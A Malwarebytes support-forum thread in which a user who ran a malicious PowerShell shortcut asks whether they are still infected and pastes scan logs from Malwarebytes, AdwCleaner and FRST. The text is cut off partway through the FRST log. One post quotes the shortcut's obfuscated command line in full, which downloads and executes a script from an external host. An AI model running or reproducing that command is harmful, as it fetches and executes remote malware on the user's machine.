Jump to content

almym

Members
  • Content Count

    3
  • Joined

  • Last visited

About almym

  • Rank
    New Member
  1. I don't know. Malwarebytes dosen't find anything. How do I know if i'm still infected?
  2. Thank you for the help. I have done what you have asked and I have attached Fixlog to this reply. Thanks again for the help!Fixlog.txt
  3. I have done the same as this guy: https://forums.malwarebytes.com/topic/245566-i-opened-a-malicious-powershell-shortcut/ My malicious file seems to be slightly different however: %20-ExecutionPolicy%20UnRestricted%20-Windo%201%20$ag=[string][char[]]@(0x69,0x65,0x58)%20-replace%20'%20',''%3Bsal%20s%20$ag%3B$nq=((New-Object%20Net.WebClient)).DownloadString('http://shortbit.xyz/psp')%3Bs%20$nq I have followed all of the steps in that post. Malwarebytes found some malitious files and removed them..... I hope i'm not still infected. All of the logs are below. Thankyou! ---Malwarebytes--- Malwarebytes www.malwarebytes.com -Log Details- Scan Date: 6/9/19 Scan Time: 7:28 PM Log File: 63f389d8-8ae4-11e9-b47d-6c4b901a0b15.json -Software Information- Version: 3.7.1.2839 Components Version: 1.0.586 Update Package Version: 1.0.10966 License: Free -System Information- OS: Windows 10 (Build 17134.765) CPU: x64 File System: NTFS User: DESKTOP-DQ6B75G\MYMLA -Scan Summary- Scan Type: Threat Scan Scan Initiated By: Manual Result: Completed Objects Scanned: 317992 Threats Detected: 16 Threats Quarantined: 16 Time Elapsed: 7 min, 1 sec -Scan Options- Memory: Enabled Startup: Enabled Filesystem: Enabled Archives: Enabled Rootkits: Disabled Heuristics: Enabled PUP: Detect PUM: Detect -Scan Details- Process: 2 Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966 Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966 Module: 2 Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966 Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966 Registry Key: 4 PUP.Optional.DefaultSearch, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\nladljmabboanhihfkjacnnkgjhnokhj, Quarantined, [300], [550469],1.0.10966 Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Scheduled Updater - {ddf058d8-0f5a-412d-bdaf-9092c48aa545}, Quarantined, [0], [392686],1.0.10966 Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{367BB1AA-628D-45AF-A386-B87979AC2CDE}, Quarantined, [0], [392686],1.0.10966 Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{367BB1AA-628D-45AF-A386-B87979AC2CDE}, Quarantined, [0], [392686],1.0.10966 Registry Value: 1 PUP.Optional.DefaultSearch, HKU\S-1-5-21-1007420050-912919110-3395148121-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|NLADLJMABBOANHIHFKJACNNKGJHNOKHJ, Quarantined, [300], [550469],1.0.10966 Registry Data: 0 (No malicious items detected) Data Stream: 0 (No malicious items detected) Folder: 0 (No malicious items detected) File: 7 PUP.Optional.DefaultSearch, C:\USERS\MYMLA\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [300], [550469],1.0.10966 Generic.Malware/Suspicious, C:\WINDOWS\SYSTEM32\TASKS\Scheduled Updater - {ddf058d8-0f5a-412d-bdaf-9092c48aa545}, Quarantined, [0], [392686],1.0.10966 Generic.Malware/Suspicious, C:\PROGRAMDATA\{DDF058D8-0F5A-412D-BDAF-9092C48AA545}\LENOVO.MODERN.IMCONTROLLER.PLUGINHOST.SETTINGSAPP.EXE, Quarantined, [0], [392686],1.0.10966 RiskWare.Tool.HCK, C:\USERS\MYMLA\DOWNLOADS\166.RAR, Quarantined, [7580], [97362],1.0.10966 RiskWare.BitCoinMiner, C:\USERS\MYMLA\DOWNLOADS\NHM_WINDOWS_1.9.0.6 (1).ZIP, Quarantined, [769], [485277],1.0.10966 RiskWare.BitCoinMiner, C:\USERS\MYMLA\DOWNLOADS\CLAYMORE.S.ZCASH.AMD.GPU.MINER.V12.6.ZIP, Quarantined, [769], [556050],1.0.10966 PUP.Optional.DefaultSearch, C:\USERS\MYMLA\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [300], [469798],1.0.10966 Physical Sector: 0 (No malicious items detected) WMI: 0 (No malicious items detected) (end) ---ADWCleaner--- # ------------------------------- # Malwarebytes AdwCleaner 7.3.0.0 # ------------------------------- # Build: 04-04-2019 # Database: 2019-05-27.1 (Cloud) # Support: https://www.malwarebytes.com/support # # ------------------------------- # Mode: Scan # ------------------------------- # Start: 06-09-2019 # Duration: 00:00:08 # OS: Windows 10 Home # Scanned: 27501 # Detected: 0 ***** [ Services ] ***** No malicious services found. ***** [ Folders ] ***** No malicious folders found. ***** [ Files ] ***** No malicious files found. ***** [ DLL ] ***** No malicious DLLs found. ***** [ WMI ] ***** No malicious WMI found. ***** [ Shortcuts ] ***** No malicious shortcuts found. ***** [ Tasks ] ***** No malicious tasks found. ***** [ Registry ] ***** No malicious registry entries found. ***** [ Chromium (and derivatives) ] ***** No malicious Chromium entries found. ***** [ Chromium URLs ] ***** No malicious Chromium URLs found. ***** [ Firefox (and derivatives) ] ***** No malicious Firefox entries found. ***** [ Firefox URLs ] ***** No malicious Firefox URLs found. AdwCleaner[S00].txt - [1767 octets] - [09/06/2019 19:46:07] AdwCleaner[C00].txt - [1841 octets] - [09/06/2019 19:46:22] ########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ########## ---FRST--- Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 09-06-2019 01 Ran by MYMLA (administrator) on DESKTOP-DQ6B75G (LENOVO 90H1001GUK) (09-06-2019 19:51:31) Running from C:\Users\MYMLA\Downloads Loaded Profiles: MYMLA (Available Profiles: MYMLA) Platform: Windows 10 Home Version 1803 17134.765 (X64) Language: English (United States) Default browser: Chrome Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atieclxx.exe (Advanced Micro Devices, Inc. -> AMD) C:\Windows\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atiesrxx.exe (Apple Inc. -> Apple Inc.) C:\Program Files\WindowsApps\AppleInc.iTunes_12095.7.41059.0_x64__nzyj5cx40ttqa\AMDS64\AppleMobileDeviceProcess.exe (Cisco Video Technologies Israel Ltd. -> Cisco) C:\Users\MYMLA\AppData\Local\Cisco\VideoGuardPlayer\VideoGuardMonitor\CiscoVideoGuardMonitor.exe (CyberLink -> CyberLink) C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe (CyberLink Corp. -> CyberLink Corp.) C:\Program Files (x86)\Cyberlink\PowerDVD14\PDVD14Serv.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Lenovo -> Lenovo Group Ltd.) C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe (LENOVO -> Lenovo) C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe (Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Malwarebytes Corporation -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\MYMLA\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Locator.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) C:\Windows\RtkBtManServ.exe (Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (PRIMAX ELECTRONICS LTD. -> ) C:\Program Files\Lenovo\Lenovo Essential Wireless Keyboard\KBOSD.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\RtkAudUService64.exe (TunnelBear -> ) C:\Program Files (x86)\TunnelBear\TunnelBear.Maintenance.exe (Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe (Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF\2.4.3.237\WsAppService.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation) HKLM\...\Run: [Lenovo Essential Wireless Keyboard OSD] => C:\Program Files\Lenovo\Lenovo Essential Wireless Keyboard\KBOSD.exe [443192 2016-11-30] (PRIMAX ELECTRONICS LTD. -> ) HKLM\...\Run: [RtkAudUService] => C:\WINDOWS\System32\RtkAudUService64.exe [672192 2018-04-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-12-05] (CyberLink -> CyberLink) HKLM-x32\...\Run: [UpdateP2GoShortCut] => C:\Program Files (x86)\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [214312 2011-12-07] (CyberLink -> CyberLink Corp.) HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645456 2019-04-01] (Oracle America, Inc. -> Oracle Corporation) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3152160 2019-04-29] (Valve -> Valve Corporation) HKU\S-1-5-21-1007420050-912919110-3395148121-1001\...\Run: [VideoGuardMonitor] => C:\Users\MYMLA\AppData\Local\Cisco\VideoGuardPlayer\VideoGuardMonitor\CiscoVideoGuardMonitor.exe [2345736 2018-04-17] (Cisco Video Technologies Israel Ltd. -> Cisco) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\75.0.3770.80\Installer\chrmstp.exe [2019-06-06] (Google LLC -> Google LLC) Lsa: [Authentication Packages] msv1_0 SshdPinAuthLsa Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\$McRebootA5E6DEAA56$.lnk [2018-09-17] ShortcutTarget: $McRebootA5E6DEAA56$.lnk -> (No File) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {1BC493F1-AA0D-4658-9CA8-8F969C1ECC17} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\c00a1f9a-ebb2-4ec1-8506-2cd23fa726ed => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.) Task: {20FC8401-FF1D-48D2-8F48-974D84E3BB7B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation) Task: {2197FE90-5D46-4141-AF1F-A53E9AF1FE26} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32 Task: {4E7BE99F-6FDA-44E0-9E68-9B9F1182D839} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-16] (Google Inc -> Google Inc.) Task: {4F2495E0-A32F-4B78-A8C7-E98724AF295B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4406928 2019-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {5085B05A-951F-4C07-96FB-DAEDFFEFCD4D} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [25907200 2019-04-15] (Microsoft Corporation -> Microsoft Corporation) Task: {6D1413A8-E311-4A78-B53C-C6A5D2414808} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [54440 2019-04-24] (Lenovo -> Lenovo Group Ltd.) Task: {6FC733B0-67A6-4BB3-9947-9EF11AC8BE5B} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\9259295b-c195-48f0-80a5-b99048df5a30 => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.) Task: {7759E137-96CE-4322-955E-4A5AA5FC1F60} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation) Task: {7B4EB0D6-266D-4A34-B14F-1A1BF7FC8561} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation) Task: {7BD2BD45-5479-4A74-A0CC-639A8E8C4370} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-16] (Google Inc -> Google Inc.) Task: {7E9AFD49-C9B4-436A-B6DD-DA986CB9BCD1} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1432200 2019-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {81B06D5F-342D-4FC0-BDB6-5262EB8AF37A} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\0605c737-d666-4405-bdff-bb907155845a => C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.) Task: {82600555-BB57-4ECD-AC75-96983C178734} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4406928 2019-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {8459D02D-A42D-4018-998E-85BD00D635BF} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1432200 2019-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {9CF68B9D-7EFB-47B5-922D-562B25749EA5} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [25907200 2019-04-15] (Microsoft Corporation -> Microsoft Corporation) Task: {9FBD5D5A-E054-4184-A6EF-2859302B9991} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MpCmdRun.exe [470024 2018-09-16] (Microsoft Corporation -> Microsoft Corporation) Task: {AB9821A2-FDE7-4BE7-A323-60F752D7DEAC} - System32\Tasks\PDVDServ14 Task => C:\Program Files (x86)\CyberLink\PowerDVD14\PDVD14Serv.exe [88344 2017-04-26] (CyberLink Corp. -> CyberLink Corp.) Task: {B43C725C-FF64-4A54-B813-906105ECDF5F} - System32\Tasks\LiteStorageUpdater => C:\Program [Argument = Files\Lenovo\LiveStorage\Server\LiteStorageUpdater.exe] Task: {C9AC6E34-19DC-404C-8C17-292A2AE472AE} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => %windir%\system32\sc.exe START ImControllerService Task: {DFC52D0B-A564-45BD-9242-2E75D9302DFD} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [112376 2019-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {EB746362-9CAD-462F-A3D9-2BC5705C2CCB} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [112376 2019-04-21] (Microsoft Corporation -> Microsoft Corporation) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{1c877760-c100-4b55-adb8-b717fe45dff1}: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{e7b99320-9b71-48ae-b327-d16485f8915b}: [DhcpNameServer] 172.18.13.1 Internet Explorer: ================== HKU\S-1-5-21-1007420050-912919110-3395148121-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE HKU\S-1-5-21-1007420050-912919110-3395148121-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.lenovo.com BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssv.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2ssv.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) FireFox: ======== FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN) FF Plugin-x32: @java.com/DTPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\dtplugin\npDeployJava1.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.211.2 -> C:\Program Files (x86)\Java\jre1.8.0_211\bin\plugin2\npjp2.dll [2019-05-18] (Oracle America, Inc. -> Oracle Corporation) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-04-05] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC) Chrome: ======= CHR DefaultProfile: Default CHR Profile: C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default [2019-06-09] CHR Extension: (Slides) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-16] CHR Extension: (Docs) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-16] CHR Extension: (Google Drive) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17] CHR Extension: (YouTube) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-16] CHR Extension: (Sheets) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-16] CHR Extension: (HTTPS Everywhere) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\gcbommkclmclpchllfjekcdonpmejbdp [2019-06-05] CHR Extension: (Google Docs Offline) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-09-16] CHR Extension: (Gmail) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-29] CHR Extension: (Chrome Media Router) - C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-06-06] CHR Profile: C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-11-04] CHR Profile: C:\Users\MYMLA\AppData\Local\Google\Chrome\User Data\System Profile [2018-11-04] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AMD External Events Utility; C:\WINDOWS\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atiesrxx.exe [508016 2018-10-15] (Advanced Micro Devices, Inc. -> AMD) R2 CCSDK; C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe [502040 2016-11-09] (LENOVO -> Lenovo) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11082536 2019-04-16] (Microsoft Corporation -> Microsoft Corporation) R2 ImControllerService; C:\Program Files\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [76968 2019-04-24] (Lenovo -> Lenovo Group Ltd.) R2 LiveStorageService; C:\Program Files\Lenovo\LiveStorage\Server\LiveStorageServer.exe [823568 2017-05-27] (LENOVO -> Lenovo) R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6562472 2019-02-01] (Malwarebytes Corporation -> Malwarebytes) R2 RtkAudioUniversalService; C:\WINDOWS\System32\RtkAudUService64.exe [672192 2018-04-19] (Realtek Semiconductor Corp. -> Realtek Semiconductor) R2 RtkBtManServ; C:\WINDOWS\RtkBtManServ.exe [301536 2017-05-20] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Semiconductor Corp.) S3 sshd; C:\WINDOWS\System32\OpenSSH\sshd.exe [970240 2018-05-20] (Microsoft Windows -> ) S3 SshdBroker; C:\WINDOWS\System32\SshdBroker.dll [285696 2019-02-16] (Microsoft Windows -> Microsoft Corporation) R2 TunnelBearMaintenance; C:\Program Files (x86)\TunnelBear\TunnelBear.Maintenance.exe [120440 2018-09-11] (TunnelBear -> ) S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\NisSrv.exe [3905952 2018-09-16] (Microsoft Corporation -> Microsoft Corporation) S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1807.18075-0\MsMpEng.exe [110944 2018-09-16] (Microsoft Corporation -> Microsoft Corporation) R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.3.237\WsAppService.exe [495720 2018-07-04] (Wondershare Technology Co.,Ltd -> Wondershare) R2 WsDrvInst; C:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe [120016 2018-07-04] (Wondershare Technology Co.,Ltd -> Wondershare) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 amdgpio2; C:\WINDOWS\System32\drivers\amdgpio2.sys [43400 2017-03-01] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc) S0 amdkmafd; C:\WINDOWS\System32\drivers\amdkmafd.sys [67544 2018-09-26] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) S3 amdkmcsp; C:\WINDOWS\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. ) R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atikmdag.sys [47499376 2018-10-15] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0334550.inf_amd64_cd83b792de8abee9\B334365\atikmpag.sys [589936 2018-10-15] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [103680 2018-09-12] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.) R3 AMDPCIDev; C:\WINDOWS\System32\drivers\AMDPCIDev.sys [31592 2018-04-25] (Advanced Micro Devices Inc. -> Advanced Micro Devices) R0 amdpsp; C:\WINDOWS\System32\DRIVERS\amdpsp.sys [243056 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. ) S3 AppleKmdfFilter; C:\WINDOWS\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.) S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.) R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys 